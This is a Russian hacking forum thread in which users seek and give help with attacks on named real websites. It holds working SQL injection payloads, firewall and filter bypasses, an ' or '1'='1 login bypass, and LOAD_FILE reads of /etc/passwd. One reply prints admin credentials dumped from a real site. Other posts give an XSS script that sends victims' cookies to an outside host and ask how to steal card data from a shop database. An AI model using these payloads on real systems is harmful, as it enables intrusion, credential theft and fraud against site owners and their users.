можно еще попытаться в url-виде может поможет если какой то ids херовый потому что в скрипте если с query_string достаеш то пхп сам в нормальный вид преобразовывает, а тогда идет сравнение...
если не прав то сори имхо мое мнение !!! :)
Какой еще слеш? Я, вроде, нормально сказал, обрезается двоеточие, обычным str_replace(), а ты стал про винду, про слеши, про регулярки придумывать.

Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
Если ввести там к примеру, кавычку, то выводится нечто подобное:

Во время добавления комментария произошла неизвестная ошибкаINSERT INTO altx_main_comments (com_id, art_id, user_id, com_user, com_ip, com_time, com_text) VALUES ('', '59', '-1', 'ronald', '5b4c118a', '1262697678', ''')

вот интересует вопрос по поводу sql inj, как можно добавит имя польз и пасс на удаленого рабочего стола через реестр. Тоесть как примерно составит запрос к базе данных (MSSQL Server 2000) чтоб в последуюшем открыть доступ к RDP
есть привелегия sa

Посмотри, может поможет чем-нибудь:
http://www.xakep.ru/post/50234/

Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
Если ввести там к примеру, кавычку, то выводится нечто подобное:
Впиши в поле имя:
name', '1', '1', concat_ws(0x3a,user(),database(),version()))#
И по структуре запроса в поле "com_text" запишется concat_ws(0x3a,user(),database(),version()), тобишь юзер:БД:версия

подскажите, как можно скачать себе на комп базу?

http://www.mysql.ru/docs/man/mysqldump.html

Подскажите как быть при такой скуле
ордером кол-во полей показывает, при вводе
.php?id=5+union+select+1,2-- принт полей не выводит, если сменить id на произвольный например 999, то приписывает id к названию таблицы и выдает ошибку, например Table 'sjc5292.table_999' doesn't exist, куда копать?

Подскажите как быть при такой скуле
ордером кол-во полей показывает, при вводе
.php?id=5+union+select+1,2-- принт полей не выводит, если сменить id на произвольный например 999, то приписывает id к названию таблицы и выдает ошибку, например Table 'sjc5292.table_999' doesn't exist, куда копать?
5+and+1=2+union+select+...
5+or(1,2)=(select+count(*),concat(version(),floor( rand(0)*2))from(select+1+union+select+2+union+sele ct+3)a+group+by+2)--+

Кто раскрутит дубли без символа * ?
Ты о чем?

Посмотри, может поможет чем-нибудь:
http://www.xakep.ru/post/50234/
спасибо то что надо

Кто раскрутит дубли без символа * ?
Т.е. допустим запрос
or(1,1)=(select+count(*),concat(version(),floor(ra nd(0)*2))from+information_schema.tables+group+by+2 )--+
Нужно сделать без символа '*', потому как он обрезает запрос, ну или он фильтруется, т.е. результат один, с ним запрос не работает.

count(*) замени на count(0).
rand(0)*2 замени на rand(0)/(1/2).

как узнать платформу интернет ресурса?

как узнать платформу интернет ресурса?

1) Найти phpinfo();
2) ошибка
3) ответ сервера


Крутой хакер-кодер писал для этого тулзу какую-ту :D

друзья, помогите пожалуйста, как можно заюзать SQL-иньекцию на данной странице авторизации http://pro-ilyichevsk.com/cms/!auth.php .

друзья, помогите пожалуйста, как можно заюзать SQL-иньекцию на данной странице авторизации http://pro-ilyichevsk.com/cms/!auth.php .

логин: ' or '1'='1
пароль: ' or '1'='1

P.S шелл в личку отправил :D

localhost/index.php?modul=char&id=1062197)+and+1=(select+*+from(select+*+from(sel ect+name_const((select+concat(username,0x3a,sha_pa ss_hash,0x3a,gmlevel,0x3a,email)+from+realmd.accou nt+where+id=12),14)d)+as+t+join+(select+name_const ((select+concat(username,0x3a,sha_pass_hash,0x3a,g mlevel,0x3a,email)+from+realmd.account+where+id=12 ),14)e)b)a)--+
Чем можно заменить name_const ?
Notice: Incorrect arguments to NAME_CONST in /var/www/web3/web/modules/char.php on line 8
пишет

localhost/index.php?modul=char&id=1062197)+and+1=(select+*+from(select+*+from(sel ect+name_const((select+concat(username,0x3a,sha_pa ss_hash,0x3a,gmlevel,0x3a,email)+from+realmd.accou nt+where+id=12),14)d)+as+t+join+(select+name_const ((select+concat(username,0x3a,sha_pass_hash,0x3a,g mlevel,0x3a,email)+from+realmd.account+where+id=12 ),14)e)b)a)--+
Чем можно заменить name_const ?
Notice: Incorrect arguments to NAME_CONST in /var/www/web3/web/modules/char.php on line 8
пишет

версия php?

UPD: http://bugs.mysql.com/bug.php?id=27545

localhost/index.php?modul=char&id=1062197)+and+1=(select+*+from(select+*+from(sel ect+name_const((select+concat(username,0x3a,sha_pa ss_hash,0x3a,gmlevel,0x3a,email)+from+realmd.accou nt+where+id=12),14)d)+as+t+join+(select+name_const ((select+concat(username,0x3a,sha_pass_hash,0x3a,g mlevel,0x3a,email)+from+realmd.account+where+id=12 ),14)e)b)a)--+
Чем можно заменить name_const ?
Notice: Incorrect arguments to NAME_CONST in /var/www/web3/web/modules/char.php on line 8
пишет

https://forum.antichat.ru/showpost.php?p=1778081&postcount=15
https://forum.antichat.ru/showpost.php?p=1788440&postcount=19

http://www.pimaair.org/collection-detail.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41
хз,что делать.=\ Не раскрутить. Посмотрите плз,что сделать в данной ситуации можно...

как слепую

http://www.pimaair.org/collection-detail.php?cid=1+and+substring(version(),1,1)=4

ага,спс.

есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??

есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??

Полей меньше, подбирай число, пока ошибки нет.

есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
Слишком уж много ты полей поставил :) Ссылку кинь, раскрутим :)

Слишком уж много ты полей поставил :) Ссылку кинь, раскрутим :)
Просто мой первый ресурс.Хотелось бы самому!
Да все уже перепробывал все что до этого числа идет ошибка!

А что делать когда на сервере стоит WAFF, но ни один способ описанный в "Web_Application_Firewall.ppt" не пашет?
Пример:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,n ame,password,pass_salt),null,null,null,null+from+n ovaboard_members+where+id=1+--+

Так выглядит боевой запрос, который точно должен сработать, но из за WAFF`a не пахает. И ничё нельзя сделать, а если правильнее, то я ничего не смог сделать.
И так по всюду, а точнее на куче сайтов, учитывая то, что с методами обхода WAFF я как бы ознакомился немножко...
Хотя что то мне подсказывает, что помимо него ещё и существует .htaccess со своими регулярными выражениями...

А что делать когда на сервере стоит WAFF, но ни один способ описанный в "Web_Application_Firewall.ppt" не пашет?
Пример:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,n ame,password,pass_salt),null,null,null,null+from+n ovaboard_members+where+id=1+--+

Так выглядит боевой запрос, который точно должен сработать, но из за WAFF`a не пахает. И ничё нельзя сделать, а если правильнее, то я ничего не смог сделать.
И так по всюду, а точнее на куче сайтов, учитывая то, что с методами обхода WAFF я как бы ознакомился немножко...
Хотя что то мне подсказывает, что помимо него ещё и существует .htaccess со своими регулярными выражениями...
значит плохо смотрел )
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)/*!union*/select+1,2,3,4,concat_ws(0x3a,name,password,pass_s alt),6,7,8,9+from+forum_members--+1

2 Nightmarе
или так
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)union(select+1,2,3,4,concat_ws(0x3a,name,passwo rd,pass_salt),6,7,8,9+from+forum_members+where+id= 1)+--+

что можно поиметь с этого: _http://vulns.ru/myadmin/scripts/setup.php
реально ли добавить новую БД или попасть в текущую?

что можно поиметь с этого: _http://vulns.ru/myadmin/scripts/setup.php
реально ли добавить новую БД или попасть в текущую?

Там нет директории конфига, поэтому перезаписать конфиг шеллом не получится.

Root-access, ясно, то есть ничего полезного из этого не сделаешь?

Root-access, ясно, то есть ничего полезного из этого не сделаешь?

Ну хз, разве что если в этом скрипте есть инъекция или хсс.

По вашему опыту: хсс-уязвимости могут быть на сайтах на базе ucoz.ru, at.ua, yandex.ru и т.п.?

По вашему опыту: хсс-уязвимости могут быть на сайтах на базе ucoz.ru, at.ua, yandex.ru и т.п.?
Были\есть на всех вышеуказанных сервисах.

Спасибо! Обнаруживаются только с помощью сканеров или вручную тоже можно?

Спасибо! Обнаруживаются только с помощью сканеров или вручную тоже можно?
Только вручную, о каких сканерах может в таких сулчаях ерчь идти вообще оО

Не знаю) Я в этом деле пока ламер. :) Несколько штук обнаруживала вручную, но говорят, что со сканерами эффективнее.

Сканеры для лолов

вопрос по скулю:
+and+(select+top+1+isnull(cast([email]+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0--

тут выводится в ответе email@domain.com^passmy
Возможно ли сделать запрос чтобы выдавало не email@domain.com^passmy
а !!!email@domain.com^passmy!!!
Тоесть надо добавит 0x212121 в начало и конец каждого ответа
это чтоб со страницы корректно спарсит нужно

Народ, прошу не пинать сильно, только сегодня начал разбираться, читаю сейчас про sql инъекции, не совсем понятно, как находить подходящие(уязвимые) сайты. Тоесть например нужно ли искать по какому-то определенному запросу в поисковике или какой-то есть софт подходящий для этого? Хотел бы попробовать поэкспериментировать, но блин не могу ничего подходящего найти.

Народ, прошу не пинать сильно, только сегодня начал разбираться, читаю сейчас про sql инъекции, не совсем понятно, как находить подходящие(уязвимые) сайты. Тоесть например нужно ли искать по какому-то определенному запросу в поисковике или какой-то есть софт подходящий для этого? Хотел бы попробовать поэкспериментировать, но блин не могу ничего подходящего найти.

google.ru => inurl:.php?id=453 inurl:.net

спасибо :) а почему именно 453 ?

Народ, прошу не пинать сильно, только сегодня начал разбираться, читаю сейчас про sql инъекции, не совсем понятно, как находить подходящие(уязвимые) сайты. Тоесть например нужно ли искать по какому-то определенному запросу в поисковике или какой-то есть софт подходящий для этого? Хотел бы попробовать поэкспериментировать, но блин не могу ничего подходящего найти.
если надо просто найти скули то уже сказали в гугле ищи, но если надо найти на определенном сайте тогда придется везде на пост и гейт запросы поставит " ' +1=1 or+1=1 и тд. Прочитай статьи на этом форуме много узнаеш.
Всё на софт поставит не рекомендую потому что иногда часто они пропускают нужные данные, тем более чтоб на софт кормит нужно найти и потом анализировать а уж потом поставит на правильный запрос.

Рекомендуемые софты есть на этом форуме и на exploit.in

--Sipt4 от от уважаемого SQLHack
--Toolza1 от уважаемого Pashkela
--Reiluke tools 2,7 от reiluke
-- и новый Havij 1.07 от r3dm0v3

эти софты впольне хватет для начала.

Лучше ручками потренируйся а потом для дампа юзаеш софты.

PS. Я сам все ещё учусь на ошибках

спасибо а почему именно 453 ?
453 не обязательно можеш искать

google.ru => inurl:.php?id= inurl:.net

Как вручную искать xss на сайтах, где нет форм для ввода?

Как вручную искать xss на сайтах, где нет форм для ввода?
Подставлять во все видимые и невидимые переменные,нужный код,ну обычно "><script>alert()</script>, POST,GET,FILES,COOKIES, во все все которые пердаються скрипту,возможно так что то найдешь :)

Paul_Eckman, смотри где введеные ГЕТ переменные отображаются на странице

такая конструкция ограничивает файлы которые можно прочитать?
я правильно понимаю?...
include_once($config['path_src_include'] . "common.inc.php");
include_once($config['path_src_include'] . "check_html.inc.php");

подскажите плз, нашел сайт, при вводе [URL]?id=1' появляется ошибка
You have an error in your SQL syntax near '\'' at line 1, но не указана БД, пробовал пинговать сервер на 3306 и 5432 порты, но тоже не там ни там ничего. Воодил разные значения (с кавычками и без),
[URL]?id=1'+GROUP+BY+5+--
[URL]?id=-1'+UNION+SELECT+1,2+--
[URL]?id=-1+union+select+null
но ошибка не меняется, подскажите что я не так делаю?

всмысле ограничивает ? если ты про "common.inc.php"); то нет, ее можно отрезать или нул байтом или кучей слешей.

а от lfi типа ../etc/passwd%00

подскажите плз, нашел сайт, при вводе [URL]?id=1' появляется ошибка
You have an error in your SQL syntax near '\'' at line 1, но не указана БД, пробовал пинговать сервер на 3306 и 5432 порты, но тоже не там ни там ничего. Воодил разные значения (с кавычками и без),
[URL]?id=1'+GROUP+BY+5+--
[URL]?id=-1'+UNION+SELECT+1,2+--
[URL]?id=-1+union+select+null
но ошибка не меняется, подскажите что я не так делаю?

подожди правильно так
?id=1'+GROUP+BY+5--+

да не, я и с комментариями и без пробовал, не меняется ((

подскажите плз, нашел сайт, при вводе [URL]?id=1' появляется ошибка
You have an error in your SQL syntax near '\'' at line 1, но не указана БД, пробовал пинговать сервер на 3306 и 5432 порты, но тоже не там ни там ничего. Воодил разные значения (с кавычками и без),
[URL]?id=1'+GROUP+BY+5+--
[URL]?id=-1'+UNION+SELECT+1,2+--
[URL]?id=-1+union+select+null
но ошибка не меняется, подскажите что я не так делаю?
Судя по ошибке, на сервере включены мэджики, так что воткнуть в запрос кавычку даже и не пытайся. А вообще, былобы неплохо увидеть линк на скулю

подскажите плз, нашел сайт, при вводе [URL]?id=1' появляется ошибка
You have an error in your SQL syntax near '\'' at line 1, но не указана БД, пробовал пинговать сервер на 3306 и 5432 порты, но тоже не там ни там ничего. Воодил разные значения (с кавычками и без),
[URL]?id=1'+GROUP+BY+5+--
[URL]?id=-1'+UNION+SELECT+1,2+--
[URL]?id=-1+union+select+null
но ошибка не меняется, подскажите что я не так делаю?

пробуй так
?id=1+order+BY+1--

в принципе неудивительно што ошибка выпадает:)
SQL syntax near '\''
0nep@t0p все верно:)

http://rozetka.com.ua/index.php?search_text=%2522%253E%253Cscript%253Eal ert%2528%2529%253C%252Fscript%253E&page=search&lang=ru&imageField.x=0&imageField.y=0 [/code] (пассивная)

Какая-то странная реакция.. :) После 2 алертов открывается доп. активное окно поиска и высвечивается кусок кода " class="sinp" />. Что это значит? :)))

не так тоже не как, ну да ладно, я пробую на новом хосте, там вроде все работает, узнал количество полей, пробую
-1+UNION+SELECT+LOAD_FILE(etc/passwd);
но мне выдается такая ошибка
Unknown column 'etc' in 'field list'
пробую на запись проверить, но пишет не правильный синтаксис
-1+UNION+SELECT+1+INTO+OUTFILE+'/tmp/file.php';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'/tmp/file.php\'' at line 1

кавычки может ему не нравятся?? без них если написать, то тоже самое, только без слешей '/tmp/file.php'
подскажите нубу плз, что можно попробовать еще?? :confused:

не так тоже не как, ну да ладно, я пробую на новом хосте, там вроде все работает, узнал количество полей, пробую
-1+UNION+SELECT+LOAD_FILE(etc/passwd);
но мне выдается такая ошибка
Unknown column 'etc' in 'field list'
пробую на запись проверить, но пишет не правильный синтаксис
-1+UNION+SELECT+1+INTO+OUTFILE+'/tmp/file.php';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'/tmp/file.php\'' at line 1

кавычки может ему не нравятся?? без них если написать, то тоже самое, только без слешей '/tmp/file.php'
подскажите нубу плз, что можно попробовать еще?? :confused:
В кавычках дело, а без кавычек нельзя.

2Gidz, при меджик квотес у тебя инто оутфайл/дампфайл работать не будет.
По поводу лоад файл:
1) -1+UNION+SELECT+LOAD_FILE(etc/passwd); <------ Это не верно, нужны кавычки:
-1+UNION+SELECT+LOAD_FILE('/etc/passwd');
А так как у тебя меджик квотес - нужно хэксить, или чарить:
-1+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764) ;

Что бы не было дальнейших вопросов - скажу, что в инот оутфайл/дампфайл путь хексить/чарить НЕЛЬЗЯ.

не выводятся принтабельный столобец, перепробовал все....

http://lanpolis.ru/private/?act1=cat&s=NDg1MTFANDg5VkgwOGhnczVQSQ==&cid=-5+and+1=2+union+select+1,2,3,4,5--

П.С. Запрос из личного кабинета, паблег акк: admin;admin
П.П.С. можно в личку

Кто научит Sql injection? Уже и уязвимый скрипт написал ,но ни как не получается. Пожалуйста помогите дураку.:) юин 3355805

скуль инжекция...
ввожу в админке:
login:"
pass:'
выдает вот такую ошибку:

Unclosed quotation mark after the character string '') AND (admin_user.public_in = 1)'.
Incorrect syntax near '') AND (admin_user.public_in = 1)

так же пробовал вариацию типо:

login:%00'
password:something:)

Incorrect syntax near 'something'. Unclosed quotation mark after the character string ') AND (admin_user.public_in = 1)'.

как в таком случае провести инжекцию?


Как вариант попробуй найти скулю на сайте..

Существуют ли уязвимости на флеш-сайтах? (напр., desstudio.co.cc)
Если да - то как их искать?

Существуют ли уязвимости на флеш-сайтах? (напр., desstudio.co.cc)
Если да - то как их искать?


Flash работает на клиенте (на компе, а не на сервере). Если ты хочешь попытаться "забраться" на сервер, то можно:

- декомпилировать Flash или просто снять посылаемые запросы, чтоб посмотреть как коммуникация с сервером идет;

- и потом в зависимости от того, какой клиент (PHP, JSP, ASP) на сервере попытаться найти уязвимость, из-/подменяя параметры/данные передаваемые Flash-Client'ом.

У меня такой вопрос, т.к. я в JSP exploiting неочень пока щарю, но учусь...

сайт: JSP (J2EE) (AJAX)
сервер: Apache Tomcat 5.0.28 с Coyote Connector
уязвимость: XSS, поле позволяет максимум 80 символов.

конечная цель: добраться до данных BD (dump)

пром. цель: залить/подключить что-то вроде шелла (есть ли для JSP нормальные?*), или слить оригиналы jsp страниц, чтоб посмотреть как обращение к BD идет.


какой самый оптимальный способ воспользоваться.

мои варианты:

1. Include, так чтоб на сайт ничего не заливать, чтоб следов поменьше было.

<jsp:include page="{HttpServletRequest().getParameter("xx")}" />

в хх подставил удаленный HTML. Чето не работает ((


Что посоветуете?


Update:

* Нашел неплохой JSP File Browser
http://www.vonloesch.de/jspbrowser.html

народ подскажите плз, как такое может быть
_ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
_ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15/*
почему не подходит?

народ подскажите плз, как такое может быть
_ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
_ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15/*
почему не подходит?
все подходит, выводи в 3 поле..и смотри сорец страницы
<title>Flash Game Studio : 4.0.27-standard</title>

все подходит, выводи в 3 поле..и смотри сорец страницы
<title>Flash Game Studio : 4.0.27-standard</title>ага выводит, а я на странице искал, сенкс :)

Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.

Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.

создай на своём хосте 1.js в него впиши

img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie;


ну и где ты там нашел xss впиши :


<script src=http://site.ru/1.js></script>

Речь о сайте онлайновой РПГ. Тут MS SQL, не имел с ний дела никогда и не нашел ничего внятного, везде практически речь о MySQL.


выглядит так: /reset?char=Fate

Выводит страницу которая показывает характеристики персонажа и кол-во уровней до ресета.

Примерно так:

Status On

Name Fate

Class Fairy Elf

Level 1

Resets 0

PK Level Default

Map Devias

Strenght 22

Agility 25

Vitality 10

Energy 15

/reset?char=Fate'[code] выводит ошибку БД соответсвенно,

та же ошибка [code]/char/Fate'

та же в регестрации в поле e-mail.

char/Fate'%20or%201=1--%20%20SELECT%20*%20FROM%20product%20WHERE%20PCateg ory=#char# or 1=1--

дает вывод

Status

Name darkknight

Class Dark Knight

Level 1

Resets 0

PK Level Default

Map Lorencia

Strenght 18

Agility 18

Vitality 15

Energy 30


Вроде все так, но в поле статус отсутствуют данные, а поля Strenght, Agility, Vitality, Energy не соответствуют полю класс, то есть если поле класс у нас Dark Knight, то эти поля не могут иметь такие значения.

Вопрос, инъекция ли это и можно ли извлечь что либо полезное из всего этого? Если можно, то подскажите плз где можно почитать подробно про MS SQL inj.

Немогу понять, почему так пишет что перебор с колонками..
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=111+or(1,1)=(select+count(*),concat(version (),floor(rand(0)*2))from(information_schema.tables )GROUP+BY+2)#
а так всё ок.
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=111+or(1,1)=(select*from(select+name_con st(version(),1),name_const(version(),1))e)
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=1111+or+(select+count(*)+from+w3t_Posts+gro up+by+concat(version(),floor(rand(0)*2)))+--+

хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
_ttp://www.asian ewsnet.net/news.php?id=-60+union+select+1,2,user(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/*

зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
но почему-то не могу к ней подключиться, ошибку пишет
?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+ta blename+--+

вопрос по скулю:

Цитата:
+and+(select+top+1+isnull(cast([email]+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0--


тут выводится в ответе email@domain.com^passmy
Возможно ли сделать запрос чтобы выдавало не email@domain.com^passmy
а !!!email@domain.com^passmy!!!
Тоесть надо добавит 0x212121 в начало и конец каждого ответа
это чтоб со страницы корректно спарсит нужно

:.']создай на своём хосте 1.js в него впиши

img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie;


ну и где ты там нашел xss впиши :


<script src=http://site.ru/1.js></script>

Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?

Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.

хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..

туц
asianewsnet.net/news.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*-+&sec=2

зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,1 2+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
но почему-то не могу к ней подключиться, ошибку пишет
?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+ta blename+--+[/QUOTE]
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+da tabase.tablename+--+
Имя базы данных:
-11+union+select+1,2,3,concat_ws(0x3a,table_name,ta ble_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SC HEMA.TABLES+LIMIT+29,1+--+
Зы:Может не хватать прав на доступ

Намекните где можно почитать, как заюзать ms03-039 и есть ли он в метасплойте. Ато в мс я его не нашел (3,2), скачал скомпилированую версию, а как заюзать хз. В cmd выдает: usage 1.exe <target_ip>
Что дальше?

В cmd выдает: usage 1.exe <target_ip>
Ну запусти сплойт с параметром "<target_ip>" - это ip адрес жертвы
example:1.exe 192.168.0.1
Зы:Самого сплойта я не видел и насчет МС незнаю

2 Gidz
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+1,1--
administrator:0641
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+2,1--
admin123:admin123

http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+3,1--
ann:bkk1854
И так далее и тому подобное...

delete

Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?

Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.
Под кавычкой имееться в виду "<" ?
Че-то не особо понятно :)
зы:Моно попробовать iframe

strip_tags() мб...

Под кавычкой имееться в виду "<" ?
Че-то не особо понятно :)
зы:Моно попробовать iframe

strip_tags() мб...
Да, под ковычкой имеется ввиду этот символ, но в связке с script, то есть итоговая комбинация фильтра <script, а по отдельности script и < не фильтруются, и разрешены.
Фрейм мне ничего не даст, моя задача стырить куки, которые в данном случае могут много чего дать.

Насколько я понял, из за ограничения в 50 символов заюзать подключение стороннего .js на другом ресурсе невозможно (это будет поболее чем 50 символов).
Значит возможность внедрить свой js код это обойти фильтр этот грёбанный.
Значит что мы имеем, в наличии всего один единственный HTML коментарий, который по какой то причине не работает если впереди него стоит символ <
Я уже начинаю сколняться к мнению, что сделать тут ничего не реально. Но так ли это всё-таки?
Если сделать действительно ничего не возможно, то напишите плз, просто сайтик очень нужный.

а xss потенциальная случайно нигде в ссылку (кликабельную) не попадает?

а xss потенциальная случайно нигде в ссылку (кликабельную) не попадает?
Неа, итоговый код оказываетя потом в такой конструкции:

<td bgcolor="white"><font color="#000000"><BODY ONLOAD=alert('lol')>ASS</font></td>

у меня есть к sql шопа. Как подключиться к базе для слива сс?
"DB_HOST" =>
"DB_NAME" =>
"DB_USER" =>
"DB_PWD" =>
Скидывай сюда переменные с полными занченями..мы попробуем сообразить как подключится.

2 Nightmarе:

<td bgcolor="white"><font color="#000000"><BODY ONLOAD=javascript:alert()>ASS</font></td>

только что проверил в последних OPERA, IE, в FF не запахало почему-то

2 Nightmarе:

<td bgcolor="white"><font color="#000000"><BODY ONLOAD=javascript:alert()>ASS</font></td>

только что проверил в последних OPERA, IE, в FF не запахало почему-то
И что это мне даст?
В моём примере такой же алерт был рабочий, то что его можно вывести я так-же в курсе.

ребята, у меня 3 вопроса вот уже долго инетресуеют, но думал со временем пойму, но не смог :))

1. Как понять запрос: and 1=0, или or 1=1
2. когда запрос начинается с ?id=-11+union.... - это значит именно этот - (минус) в начале ?
3. часто, или постоянно в инексиях замечаю такое:
select+1,2,3,4,5,6,7,8,9,10,11,12.. или такое: /../../../../../
можете обяснить что это значит и от чего зависит длина :) т.е. откуда берется эти цифры.

ребята, у меня 3 вопроса вот уже долго инетресуеют, но думал со временем пойму, но не смог :))

1. Как понять запрос: and 1=0, или or 1=1
2. когда запрос начинается с ?id=-11+union.... - это значит именно этот - (минус) в начале ?
3. часто, или постоянно в инексиях замечаю такое:
select+1,2,3,4,5,6,7,8,9,10,11,12.. или такое: /../../../../../
можете обяснить что это значит и от чего зависит длина :) т.е. откуда берется эти цифры.

Для кого статьи придумали?
1. 1 никогда не 0, условие не выполняется, нужно для скуль
0 равно 0, выполняется, также ноебходмо
2. минус ставится, чтобы в Бд не было такого айди дабы выводились видимые поля
3. цифры - для поиска выводимых полей. ../ - для инклуда файлов, пднятие по каталогам


Вообще, почитай статьи

http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+order+by+20 -true

http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+1=1 -true

http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+substring(@@version,1 ,1)=3,4,5 -false

как прокрутить скуль?

http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+order+by+20 -true

http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+1=1 -true

http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+substring(@@version,1 ,1)=3,4,5 -false

как прокрутить скуль?
Может быть тут нужно условие?)
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+if%28substring%28@@ve rsion,1%20,1%29=1,1,0%29
Не пробывал,но помоему оно необходимо :)

Может быть тут нужно условие?)
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+if%28substring%28@@ve rsion,1%20,1%29=1,1,0%29
Не пробывал,но помоему оно необходимо :)


false(

Причём тут http://www.korea.net/? Совсем другой сайт.

туц

